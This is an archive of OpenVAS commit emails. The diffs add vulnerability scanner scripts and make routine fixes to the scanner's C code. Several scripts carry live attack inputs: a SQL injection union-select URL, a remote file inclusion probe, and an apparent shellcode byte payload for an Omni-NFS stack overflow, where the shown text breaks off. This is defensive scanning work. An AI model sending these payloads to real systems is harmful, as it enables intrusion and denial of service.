trunk/openvas-plugins/scripts/gb_linkspheric_viewlisting_sql_inj_vuln.nasl 2009-10-08 06:22:29 UTC (rev 5436) @@ -0,0 +1,112 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_linkspheric_viewlisting_sql_inj_vuln.nasl 5169 2009-10-08 11:43:17Z oct $ +# +# linkSpheric 'viewListing.php' SQL Injection Vulnerability +# +# Authors: +# Sharath S +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801113); + script_version("$Revision: 1.0 $"); + script_cve_id("CVE-2009-3510"); + script_name("linkSpheric 'viewListing.php' SQL Injection Vulnerability"); + desc = " + Overview: The host is running linkSpheric and is prone to SQL Injection + vulnerability. + + Vulnerability Insight: + The flaw is due to error in viewListing.php which can be exploited to cause + SQL injection via the 'listID' parameter. + + Impact: + Successful exploitation could allow execution of arbitrary SQL commands in + the affected application. + + Impact Level: Application + + Affected Software/OS: + linkSpheric version 0.74 Beta 6 and prior. + + Fix: No solution or patch is available as on 08th October, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://dataspheric.com/ + + References: + http://www.milw0rm.com/exploits/9316 + https://launchpad.net/bugs/cve/2009-3510 + + CVSS Score: + CVSS Base Score : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 6.7 + Risk factor: High"; + + script_description(desc); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_summary("Check through the attack string and version of linkSpheric"); + script_category(ACT_MIXED_ATTACK); + script_family("Web application abuses"); + script_dependencies("gb_linkspheric_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +spheric_port = get_http_port(default:80); +if(!spheric_port){ + exit(0); +} + +spheric_ver = get_kb_item("www/" + spheric_port + "/linkSpheric"); +if(isnull(spheric_ver)){ + exit(0); +} + +spheric_ver = eregmatch(pattern:"^(.+) under (/.*)$", string:spheric_ver); +if(!isnull(spheric_ver[2]) && !safe_checks()) +{ + url = string(spheric_ver[2], "/viewListing.php?listID=-5+union+select+1,2," + + "3,4,5,6,7,8,0x4f70656e5641532d53514c2d496e6a656374696f6e2d54" + + "657374,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27" + + ",28+from+users--"); + + sndReq = http_get(item:url, port:spheric_port); + rcvRes = http_send_recv(port:spheric_port, data:sndReq); + + if(egrep(pattern: "OpenVAS-SQL-Injection-Test", string:rcvRes)) + { + security_hole(spheric_port); + exit(0); + } +} +else +{ + if(spheric_ver[1] != NULL) + { + if(version_is_less_equal(version:spheric_ver[1], test_version:"0.74.Beta.6")){ + security_hole(spheric_port); + } + } +} Property changes on: trunk/openvas-plugins/scripts/gb_linkspheric_viewlisting_sql_inj_vuln.nasl ___________________________________________________________________ Name: svn:executable + * Added: trunk/openvas-plugins/scripts/gb_phpgenealogie_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_phpgenealogie_detect.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_phpgenealogie_detect.nasl 2009-10-08 06:22:29 UTC (rev 5436) @@ -0,0 +1,73 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id: gb_phpgenealogie_detect.nasl 5168 2009-10-07 16:25:36Z oct $ +# +# PHPGenealogie Version Detection +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801007); + script_version("$Revision: 1.0 $"); + script_name("PHPGenealogie Version Detection"); + desc = " + Overview: This script detects the installed version of PHPGenealogie and + sets the result in KB. + + Risk factor: Informational"; + + script_description(desc); + script_summary("Set the version of PHPGenealogie in KB"); + script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Service detection"); + script_dependencies("find_service.nes"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); + +phpgenPort = get_http_port(default:80); +if(!phpgenPort){ + phpgenPort = 80; +} + +if(!get_port_state(phpgenPort)){ + exit(0); +} + +foreach path (make_list("/geneald", "/genealogie_sql", "/genealogie", cgi_dirs())) +{ + sndReq = http_get(item:string(path, "/Index2.php"), port:phpgenPort); + rcvRes = http_send_recv(port:phpgenPort, data:sndReq); + if("genealogie" >< rcvRes) + { + phpgenVer = eregmatch(pattern:"> ([0-9.]+)",string:rcvRes); + if(phpgenVer[1] != NULL) + { + set_kb_item(name:"www/" + phpgenPort + "/PHPGenealogie", + value:phpgenVer[1] + " under " + path); + } + } +} Added: trunk/openvas-plugins/scripts/gb_phpgenealogie_rfi_vuln.nasl =================================================================== --- trunk/openvas-plugins/scripts/gb_phpgenealogie_rfi_vuln.nasl 2009-10-07 15:35:56 UTC (rev 5435) +++ trunk/openvas-plugins/scripts/gb_phpgenealogie_rfi_vuln.nasl 2009-10-08 06:22:29 UTC (rev 5436) @@ -0,0 +1,105 @@ +############################################################################## +# OpenVAS Vulnerability Test +# $Id: gb_phpgenealogie_rfi_vuln.nasl 5168 2009-10-07 09:56:24Z oct $ +# +# PHPGenealogie 'CoupleDB.php' Remote File Inclusion Vulnerability +# +# Authors: +# Antu Sanadi +# +# Copyright: +# Copyright (c) 2009 Intevation GmbH, http://www.intevation.net +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if(description) +{ + script_id(801008); + script_version("$Revision: 1.0$"); + script_cve_id("CVE-2009-3541"); + script_name("PHPGenealogie 'CoupleDB.php' Remote File Inclusion Vulnerability"); + desc = " + Overview: This host is running PHPGenealogie and is prone to Remote File + Inclusion vulnerability. + + Vulnerability Insight: + The flaw is due to error in 'DataDirectory' parameter in 'CoupleDB.php' which + is not properly verified before being used to include files. + + Impact: + Successful exploitation will let the attacker to execute arbitrary code on + the vulnerable Web server. + + Impact level: Application/System + + Affected Software/OS: + PHPGenealogie version 2.0 + + Fix: No solution or patch is available as on 07th October, 2009. Information + regarding this issue will be updated once the solution details are available. + For updates refer, http://sourceforge.net/projects/phpgenealogie/files/ + + References: + http://www.milw0rm.com/exploits/9155 + http://xforce.iss.net/xforce/xfdb/51728 + + CVSS Score: + CVSS Base Score : 7.5 (AV:N/AC:L/Au:NR/C:P/I:P/A:P) + CVSS Temporal Score : 6.7 + Risk factor: High"; + + script_description(desc); + script_summary("Check for the version and attack of PHPGenealogie"); + script_category(ACT_MIXED_ATTACK); + script_copyright("Copyright (C) 2009 Intevation GmbH"); + script_family("Web application abuses"); + script_dependencies("gb_phpgenealogie_detect.nasl"); + script_require_ports("Services/www", 80); + exit(0); +} + + +include("http_func.inc"); +include("version_func.inc"); + +phpgenPort = get_http_port(default:80); +if(!phpgenPort){ + exit(0); +} + +phpgenVer = get_kb_item("www/" + phpgenPort + "/PHPGenealogie"); +phpgenVer = eregmatch(pattern:"^(.+) under (/.*)$", string:phpgenVer); + +if((phpgenVer[2] != NULL) && (!safe_checks())) +{ + sndReq = http_get(item:string(phpgenVer[2], "/CoupleDB.php?Parametre=0&" + + "DataDirectory=xyz/OpenVAS-RemoteFileInclusion.txt"), + port:phpgenPort); + rcvRes = http_send_recv(port:phpgenPort, data:sndReq); + if("xyz/OpenVAS-RemoteFileInclusion.txt" >< rcvRes) + { + security_hole(phpgenPort); + exit(0); + } +} +else +{ + if(phpgenVer[1] != NULL) + { + if(version_is_equal(version:phpgenVer[1], test_version:"2.0")){ + security_hole(phpgenPort); + } + } +} Property changes on: trunk/openvas-plugins/scripts/gb_phpgenealogie_rfi_vuln.nasl ___________________________________________________________________ Name: svn:executable + * From scm-commit at wald.intevation.org Thu Oct 8 09:48:40 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 09:48:40 +0200 (CEST) Subject: [Openvas-commits] r5437 - in trunk/openvas-libraries: . nasl Message-ID: <20091008074840.94CFF85C72FF@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-08 09:48:39 +0200 (Thu, 08 Oct 2009) New Revision: 5437 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/nasl/CMakeLists.txt Log: * nasl/CMakeList.txt: Added defines for _FILE_OFFSET_BITS and LARGEFILE_SOURCE since they are needed by GPGME for key access. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-08 06:22:29 UTC (rev 5436) +++ trunk/openvas-libraries/ChangeLog 2009-10-08 07:48:39 UTC (rev 5437) @@ -1,3 +1,8 @@ +2009-10-08 Michael Wiegand + + * nasl/CMakeList.txt: Added defines for _FILE_OFFSET_BITS and + LARGEFILE_SOURCE since they are needed by GPGME for key access. + 2009-10-07 Matthew Mundell * misc/openvas_server.c (openvas_server_open): Create address with Modified: trunk/openvas-libraries/nasl/CMakeLists.txt =================================================================== --- trunk/openvas-libraries/nasl/CMakeLists.txt 2009-10-08 06:22:29 UTC (rev 5436) +++ trunk/openvas-libraries/nasl/CMakeLists.txt 2009-10-08 07:48:39 UTC (rev 5437) @@ -129,7 +129,8 @@ ## Library set (CMAKE_C_FLAGS_DEBUG "${CMAKE_C_FLAGS_DEBUG} -Wall") -set (CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Wall") +# The "-D_FILE_OFFSET_BITS=64 -DLARGEFILE_SOURCE=1" is necessary for GPGME! +set (CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -Wall -D_FILE_OFFSET_BITS=64 -DLARGEFILE_SOURCE=1") ## Compile the parser - note that there are (better) CMake macros to achieve From scm-commit at wald.intevation.org Thu Oct 8 10:28:30 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 10:28:30 +0200 (CEST) Subject: [Openvas-commits] r5438 - in trunk/openvas-plugins: . scripts Message-ID: <20091008082830.3494685D9F46@pyrosoma.intevation.org> Author: mime Date: 2009-10-08 10:28:27 +0200 (Thu, 08 Oct 2009) New Revision: 5438 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/scripts/showmount.nasl Log: Added script_copyright to showmount.nasl Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-08 07:48:39 UTC (rev 5437) +++ trunk/openvas-plugins/ChangeLog 2009-10-08 08:28:27 UTC (rev 5438) @@ -1,3 +1,8 @@ +2009-10-08 Michael Meyer + + * scripts/showmount.nasl: + Added script_copyright(). + 2009-10-08 Chandrashekhar B * scripts/gb_phpgenealogie_detect.nasl, Modified: trunk/openvas-plugins/scripts/showmount.nasl =================================================================== --- trunk/openvas-plugins/scripts/showmount.nasl 2009-10-08 07:48:39 UTC (rev 5437) +++ trunk/openvas-plugins/scripts/showmount.nasl 2009-10-08 08:28:27 UTC (rev 5438) @@ -24,6 +24,7 @@ # License along with this program. If not, see # . ################################################################### + if(description) { script_id(102014); @@ -50,6 +51,7 @@ script_description(desc); script_summary("Checks for NFS shares"); script_category(ACT_GATHER_INFO); + script_copyright("Copyright (C) 2009 LSS"); script_family("Remote file access"); script_dependencie("secpod_rpc_portmap.nasl"); script_require_keys("rpc/portmap"); From scm-commit at wald.intevation.org Thu Oct 8 11:41:24 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 11:41:24 +0200 (CEST) Subject: [Openvas-commits] r5439 - in trunk/openvas-scanner: . openvassd Message-ID: <20091008094124.84F0F85D9F5D@pyrosoma.intevation.org> Author: mwiegand Date: 2009-10-08 11:41:23 +0200 (Thu, 08 Oct 2009) New Revision: 5439 Modified: trunk/openvas-scanner/ChangeLog trunk/openvas-scanner/openvassd/otp_1_0.c Log: * openvassd/otp_1_0.c (otp_1_0_server_send_certificates): Added todo for segfault on nonexistent public key. Modified: trunk/openvas-scanner/ChangeLog =================================================================== --- trunk/openvas-scanner/ChangeLog 2009-10-08 08:28:27 UTC (rev 5438) +++ trunk/openvas-scanner/ChangeLog 2009-10-08 09:41:23 UTC (rev 5439) @@ -1,3 +1,8 @@ +2009-10-08 Michael Wiegand + + * openvassd/otp_1_0.c (otp_1_0_server_send_certificates): Added todo + for segfault on nonexistent public key. + 2009-10-06 Tim Brown * openvassd/utils.c: Fixed memory leak, typos and resource leak. Also added Modified: trunk/openvas-scanner/openvassd/otp_1_0.c =================================================================== --- trunk/openvas-scanner/openvassd/otp_1_0.c 2009-10-08 08:28:27 UTC (rev 5438) +++ trunk/openvas-scanner/openvassd/otp_1_0.c 2009-10-08 09:41:23 UTC (rev 5439) @@ -93,6 +93,10 @@ // Replace newlines by semicolons gchar* pos = cert->public_key; + /** @todo This will segfault if the public key could not be retrieved. + * A solution would be to check if cert->public_key is NULL and try to + * recover if it is. + */ while(pos[0] != '\0') { if(pos[0] == '\n') pos[0] = ';'; From scm-commit at wald.intevation.org Thu Oct 8 12:26:03 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 12:26:03 +0200 (CEST) Subject: [Openvas-commits] r5440 - in trunk/openvas-client: . openvas openvas/prefs_dialog Message-ID: <20091008102603.59FE6861EAA0@pyrosoma.intevation.org> Author: mattm Date: 2009-10-08 12:26:01 +0200 (Thu, 08 Oct 2009) New Revision: 5440 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/openvas-client.c trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/openvas-client.c [USE_OMP] (refresh_server): Remove context_save_recurse. * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (scopetree_refresh): Call context_save_recurse after prefs_context_update after refresh_server, so that plugin prefs are synced before the RC is saved. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-08 09:41:23 UTC (rev 5439) +++ trunk/openvas-client/ChangeLog 2009-10-08 10:26:01 UTC (rev 5440) @@ -1,3 +1,12 @@ +2009-10-08 Matthew Mundell + + * openvas/openvas-client.c [USE_OMP] (refresh_server): Remove + context_save_recurse. + + * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (scopetree_refresh): + Call context_save_recurse after prefs_context_update after refresh_server, + so that plugin prefs are synced before the RC is saved. + 2009-10-07 Matthew Mundell * openvas/prefs_dialog/prefs_scope_tree.c [USE_OMP] (create_omp_scope): Modified: trunk/openvas-client/openvas/openvas-client.c =================================================================== --- trunk/openvas-client/openvas/openvas-client.c 2009-10-08 09:41:23 UTC (rev 5439) +++ trunk/openvas-client/openvas/openvas-client.c 2009-10-08 10:26:01 UTC (rev 5440) @@ -460,9 +460,6 @@ plugin_cache_write (context, context->plugins_md5sum); } - /* Save the RC to disk, so that new scopes can copy it. */ - context_save_recurse (context); - return NULL; } #endif /* USE_OMP */ Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-08 09:41:23 UTC (rev 5439) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-08 10:26:01 UTC (rev 5440) @@ -1253,8 +1253,12 @@ /* Refresh the information about the manager. */ message = refresh_server (context); - // FIX why? (was setting _login here and saving prefs) + /* This is necessary, at least because it calls context_sync_plugin_prefs, + * which copies plugin prefs from context->plugins and context->scanners to + * context->plugin_prefs. */ prefs_context_update (context); + /* Save the RC to disk, so that new scopes can copy it. */ + context_save_recurse (context); if (message) { openvas_server_close (context->socket, context->session); From scm-commit at wald.intevation.org Thu Oct 8 14:21:17 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 14:21:17 +0200 (CEST) Subject: [Openvas-commits] r5441 - in trunk/openvas-manager: . src Message-ID: <20091008122117.0239385C72EB@pyrosoma.intevation.org> Author: mattm Date: 2009-10-08 14:21:16 +0200 (Thu, 08 Oct 2009) New Revision: 5441 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/tasks_sql.h Log: * src/tasks_sql.h (set_task_parameter): Free rc on fail. Moving setting the task description and targets to precede filling the config, as insert_rc_into_config modifies its rc argument. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2009-10-08 10:26:01 UTC (rev 5440) +++ trunk/openvas-manager/ChangeLog 2009-10-08 12:21:16 UTC (rev 5441) @@ -1,3 +1,9 @@ +2009-10-08 Matthew Mundell + + * src/tasks_sql.h (set_task_parameter): Free rc on fail. Moving setting + the task description and targets to precede filling the config, as + insert_rc_into_config modifies its rc argument. + 2009-10-07 Matthew Mundell * src/tasks_sql.h (make_task_rcfile): Remove append of name. Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2009-10-08 10:26:01 UTC (rev 5440) +++ trunk/openvas-manager/src/tasks_sql.h 2009-10-08 12:21:16 UTC (rev 5441) @@ -2766,6 +2766,8 @@ int set_task_parameter (task_t task, const char* parameter, /*@only@*/ char* value) { + /** @todo Free value consistently. */ + tracef (" set_task_parameter %u %s\n", task_id (task), parameter ? parameter : "(null)"); @@ -2785,6 +2787,14 @@ sql ("BEGIN IMMEDIATE;"); + /* Update task description (rcfile). */ + + quoted_rc = sql_quote ((gchar*) rc); + sql ("UPDATE tasks SET description = '%s' WHERE ROWID = %llu;", + quoted_rc, + task); + g_free (quoted_rc); + /* Update task config. */ { @@ -2795,6 +2805,7 @@ config_name = task_config (task); if (config_name == NULL) { + g_free (rc); sql ("END"); return -1; } @@ -2803,6 +2814,7 @@ if (target == NULL) { free (config_name); + g_free (rc); sql ("END"); return -1; } @@ -2812,6 +2824,7 @@ { free (config_name); free (target); + g_free (rc); sql ("END"); return -1; } @@ -2823,6 +2836,7 @@ free (quoted_selector); free (config_name); free (target); + g_free (rc); sql ("END"); return -1; } @@ -2831,6 +2845,7 @@ free (quoted_selector); free (config_name); free (target); + g_free (rc); sql ("END"); return -1; } @@ -2849,39 +2864,35 @@ quoted_selector); free (quoted_selector); - /* Fill config from RC. */ + /* Replace targets. */ - quoted_config_name = sql_quote (config_name); - free (config_name); - if (insert_rc_into_config (config, quoted_config_name, (gchar*) rc)) + hosts = rc_preference ((gchar*) rc, "targets"); + if (hosts == NULL) { + free (config_name); + g_free (rc); sql ("END"); return -1; } + set_target_hosts (target, hosts); + free (hosts); - /* Replace targets. */ + /* Fill config from RC. */ - hosts = rc_preference ((gchar*) rc, "targets"); - if (hosts == NULL) + quoted_config_name = sql_quote (config_name); + free (config_name); + /* This modifies rc. */ + if (insert_rc_into_config (config, quoted_config_name, (gchar*) rc)) { + g_free (rc); sql ("END"); return -1; } - set_target_hosts (target, hosts); - free (hosts); + g_free (rc); } + + sql ("COMMIT"); } - - /* Update task description (rcfile). */ - - quoted_rc = sql_quote ((gchar*) rc); - g_free (rc); - sql ("UPDATE tasks SET description = '%s' WHERE ROWID = %llu;", - quoted_rc, - task); - g_free (quoted_rc); - - sql ("COMMIT"); } else if (strcasecmp ("NAME", parameter) == 0) { From scm-commit at wald.intevation.org Thu Oct 8 14:27:44 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 14:27:44 +0200 (CEST) Subject: [Openvas-commits] r5442 - in trunk/openvas-client: . openvas/prefs_dialog Message-ID: <20091008122744.2CD55861EAA8@pyrosoma.intevation.org> Author: mattm Date: 2009-10-08 14:27:43 +0200 (Thu, 08 Oct 2009) New Revision: 5442 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c Log: * openvas/prefs_dialog/prefs_scope_tree.c (scopetree_new_with_parent/scopetree_add_new_with_parent) [USE_OMP]: Note error in g_file_get_contents fail handling. Check omp_modify_task return. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2009-10-08 12:21:16 UTC (rev 5441) +++ trunk/openvas-client/ChangeLog 2009-10-08 12:27:43 UTC (rev 5442) @@ -1,5 +1,12 @@ 2009-10-08 Matthew Mundell + * openvas/prefs_dialog/prefs_scope_tree.c + (scopetree_new_with_parent/scopetree_add_new_with_parent) [USE_OMP]: + Note error in g_file_get_contents fail handling. Check omp_modify_task + return. + +2009-10-08 Matthew Mundell + * openvas/openvas-client.c [USE_OMP] (refresh_server): Remove context_save_recurse. Modified: trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c =================================================================== --- trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-08 12:21:16 UTC (rev 5441) +++ trunk/openvas-client/openvas/prefs_dialog/prefs_scope_tree.c 2009-10-08 12:27:43 UTC (rev 5442) @@ -415,17 +415,26 @@ g_file_get_contents (rcfile, &rc, &rc_len, &error); if (error) { - // FIX note error + free (id); + show_error (_("%s: Failed to get scope RC file: %s"), + __FUNCTION__, + error->message); g_error_free (error); openvas_server_close (server->socket, server->session); server->socket = 0; + return NULL; + } + + if (omp_modify_task (&server->session, id, rc, NULL, NULL)) + { free (id); - show_error (_("%s: Failed to get scope RC file"), __FUNCTION__); + g_free (rc); + show_error (_("%s: Failed to set RC on task on manager"), + __FUNCTION__); + openvas_server_close (server->socket, server->session); + server->socket = 0; return NULL; } - - // FIX check error - omp_modify_task (&server->session, id, rc, NULL, NULL); g_free (rc); openvas_server_close (server->socket, server->session); From scm-commit at wald.intevation.org Thu Oct 8 20:03:38 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Thu, 8 Oct 2009 20:03:38 +0200 (CEST) Subject: [Openvas-commits] r5443 - in trunk/openvas-plugins: . scripts Message-ID: <20091008180338.1A0C785D9F47@pyrosoma.intevation.org> Author: mime Date: 2009-10-08 20:03:34 +0200 (Thu, 08 Oct 2009) New Revision: 5443 Added: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl trunk/openvas-plugins/scripts/Xlpd_36610.nasl Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl trunk/openvas-plugins/scripts/secpod_smb_func.inc trunk/openvas-plugins/scripts/smb_explorer_version.nasl trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl trunk/openvas-plugins/scripts/spybot_detection.nasl Log: Added new plugins Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/ChangeLog 2009-10-08 18:03:34 UTC (rev 5443) @@ -1,5 +1,21 @@ 2009-10-08 Michael Meyer + * scripts/Xlpd_36610.nasl, + scripts/Omni_NFS_36608.nasl: + Added new plugins. + + * scripts/spybot_detection.nasl, + scripts/cisco_vpn_client_detect.nasl, + scripts/smb_explorer_version.nasl, + scripts/sonicwall_vpn_client_detect.nasl: + Modified so that they don't need smb_func.inc + anymore. + + * scripts/secpod_smb_func.inc: + Added function GetVersionFromFile(). + +2009-10-08 Michael Meyer + * scripts/showmount.nasl: Added script_copyright(). Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/cve_current.txt 2009-10-08 18:03:34 UTC (rev 5443) @@ -119,3 +119,5 @@ CVE-2009-3562 SecPod CVE-2009-3561 SecPod CVE-2009-3525 SecPod +36610 Greenbone svn R +36608 Greenbone svn R Added: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl =================================================================== --- trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl 2009-10-08 18:03:34 UTC (rev 5443) @@ -0,0 +1,123 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100297); + script_bugtraq_id(36608); + script_version ("1.0-$Revision$"); + + script_name("Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities"); + +desc = "Overview: +Omni-NFS is prone to multiple stack-based buffer-overflow +vulnerabilities because the application fails to properly bounds-check +user-supplied network data before copying it into an insufficiently +sized memory buffer. The issues affect both server and client. + +Exploiting these issues allows attackers to execute arbitrary machine +code in the context of users running the affected application. Failed +attempts will likely crash the application, resulting in denial-of- +service conditions. + +Omni-NFS 5.2 is vulnerable; other versions may also be affected. + +References: +http://www.securityfocus.com/bid/36608 +http://www.xlink.com/nfs_products/NFS_Server/NFS_Server.htm + +Risk factor : Low"; + + script_description(desc); + script_summary("Determine if Omni-NFS is prone to a Stack Buffer Overflow"); + script_category(ACT_DENIAL); + script_family("Buffer overflow"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl"); + script_require_ports("Services/ftp", 21); + exit(0); +} + +include("misc_func.inc"); +include("ftp_func.inc"); + +if(safe_checks())exit(0); + +port = get_kb_item("Services/ftp"); +if(!port)port = 21; + +if(get_kb_item('ftp/'+port+'/broken'))exit(0); +if(!get_port_state(port))exit(0); + +banner = get_ftp_banner(port:port); + +if("XLINK" >!< banner)exit(0); + +soc = open_sock_tcp(port); +if(!soc)exit(0); + +crapdata = crap(length:30000); + +req = raw_string(0x4e,0x40,0x96,0xb5,0x46,0x89,0xe3,0x4a,0x1c,0xb1,0x98,0x2c,0xb4,0xb3,0x7b,0x39, +0xf5,0xa9,0x7c,0x15,0xb7,0xba,0x8c,0xe1,0x4b,0x90,0x73,0x27,0x7b,0x70,0x75,0x10, +0xe0,0x72,0x4b,0x83,0xeb,0x7a,0x79,0x3c,0xb7,0x48,0x71,0x24,0x7d,0x2d,0xbe,0x40, +0xb0,0x97,0x46,0x0c,0x1c,0x96,0x80,0xd4,0x3b,0xe2,0x41,0x1d,0xba,0x81,0xfd,0x37, +0x04,0x15,0xbb,0x43,0xb6,0x49,0x8d,0x93,0x77,0x66,0x42,0x76,0x78,0x74,0x7f,0x2c, +0x0b,0xf5,0x99,0x47,0xb8,0x9b,0x98,0x29,0xe3,0x05,0x4e,0xb5,0xa9,0xb4,0x14,0x4a, +0xbf,0x86,0xd6,0xb3,0xb9,0x77,0x31,0xf9,0xa8,0xb2,0x7d,0x02,0xd5,0xb1,0x78,0x35, +0x73,0x67,0x7f,0x2a,0xe0,0x34,0x71,0x4f,0x7c,0x03,0xfc,0x91,0x74,0x19,0xeb,0x32, +0xf6,0xe2,0x3f,0x9f,0x7b,0x1a,0xc1,0xf8,0x92,0xbb,0xb3,0x7a,0x18,0xe1,0x42,0x87, +0xf9,0xb4,0x4b,0x79,0x04,0xba,0x75,0x38,0xe3,0x3c,0x98,0x67,0xb6,0xbf,0xa9,0x09, +0xf8,0x91,0xb8,0x4e,0x43,0xb9,0xb7,0x2d,0x72,0x12,0xfc,0x3f,0x9b,0x8d,0x49,0x76, +0x05,0x23,0xd4,0x2c,0x93,0x46,0xb2,0x0c,0x15,0x4a,0x90,0x37,0x1b,0xc0,0xd6,0x24, +0xb5,0x70,0x14,0x48,0x66,0xbe,0x27,0xa8,0x34,0x96,0x88,0xd5,0x1c,0x1d,0x99,0xb0, +0x9f,0x40,0x97,0xf5,0xfd,0x35,0x47,0x92,0xb1,0x41,0x4f,0x81,0xc4,0xff,0xef,0xff, +0xff,0x44,0x31,0xc9,0xbe,0x1c,0x89,0xb0,0x67,0xdb,0xda,0xd9,0x74,0x24,0xf4,0xb1, +0x02,0x58,0x31,0x70,0x13,0x83,0xc0,0x04,0x03,0x70,0x0f,0xe2,0xe9,0x08,0x74,0x33, +0xe3,0xf4,0x8a,0x70,0x9c,0xf0,0x01,0x10) 